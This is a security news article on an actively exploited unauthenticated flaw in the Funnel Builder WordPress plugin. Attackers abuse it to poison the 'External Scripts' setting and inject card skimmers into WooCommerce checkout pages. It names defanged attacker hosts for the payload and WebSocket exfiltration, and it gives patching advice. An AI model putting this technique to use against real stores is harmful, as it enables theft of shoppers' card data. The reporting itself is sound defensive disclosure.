A critical vulnerability in the Funnel Builder WordPress plugin is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages, enabling attackers to steal credit card details and other customer information. The issue affects all ve
Something is rewriting what shoppers see right at the moment they’re entering payment details.. Security researchers say attackers are exploiting a flaw in the Funnel Builder WordPress plugin to inject malicious JavaScript into WooCommerce checkout pages. turning checkout customization features into a delivery mechanism for card skimmers.
The problem is tied to Funnel Builder. a plugin developed by FunnelKit that lets site owners reshape WooCommerce checkout screens and add functions like one-click upsells and landing pages.. Sansec reports the malicious activity has been ongoing. and the plugin is installed on more than 40. 000 websites. according to WordPress.org stats—meaning a successful compromise can reach a lot of transactions.
Sansec says the vulnerability has not received an official identifier and can be used without authentication. The affected versions are all releases before 3.15.0.3.
What attackers are doing. according to Sansec’s observations. is disguising the malicious payload as something that looks like legitimate tracking code.. The payload is delivered from analytics-reports[.]com/wss/jquery-lib.js and presented as a fake Google Tag Manager/Google Analytics script.. Instead of staying inside the checkout page safely. the injected script opens a WebSocket connection to an external location at wss://protect-wss[.]com/ws.
That connection is part of how the attacker modifies Funnel Builder’s behavior.. Sansec says a compromised attacker can alter the plugin’s global settings by targeting an unprotected, publicly exposed checkout endpoint.. From there, they can insert arbitrary JavaScript into the plugin’s “External Scripts” setting.. Once that setting is poisoned, the malicious code runs on every checkout page.
The goal is direct and financial.. Sansec reports the attacker-controlled server delivers a customized payment card skimmer designed to steal credit card numbers. CVVs. billing addresses. and other customer information.. Stolen records typically end up used for fraudulent online purchases. and they’re often sold individually or in bulk through carding markets on the dark web.
FunnelKit moved quickly to stop the bleeding. The company addressed the issue in Funnel Builder version 3.15.0.3, released yesterday. A security advisory shared with Sansec confirms the vendor’s own findings, saying: “we identified an issue that allowed bad actors to inject scripts.”
The immediate takeaway for site owners is practical: update first, then check what attackers may have already altered.. FunnelKit recommends that administrators prioritize updating to the latest version from the WordPress dashboard.. It also advises reviewing Settings > Checkout > External Scripts for potential rogue scripts the attacker may have added—because even after patching. any already-injected script may still be sitting in the configuration.
Funnel Builder WordPress plugin WooCommerce checkout payment card skimmer JavaScript injection cybersecurity Sansec FunnelKit CVV theft dark web carding markets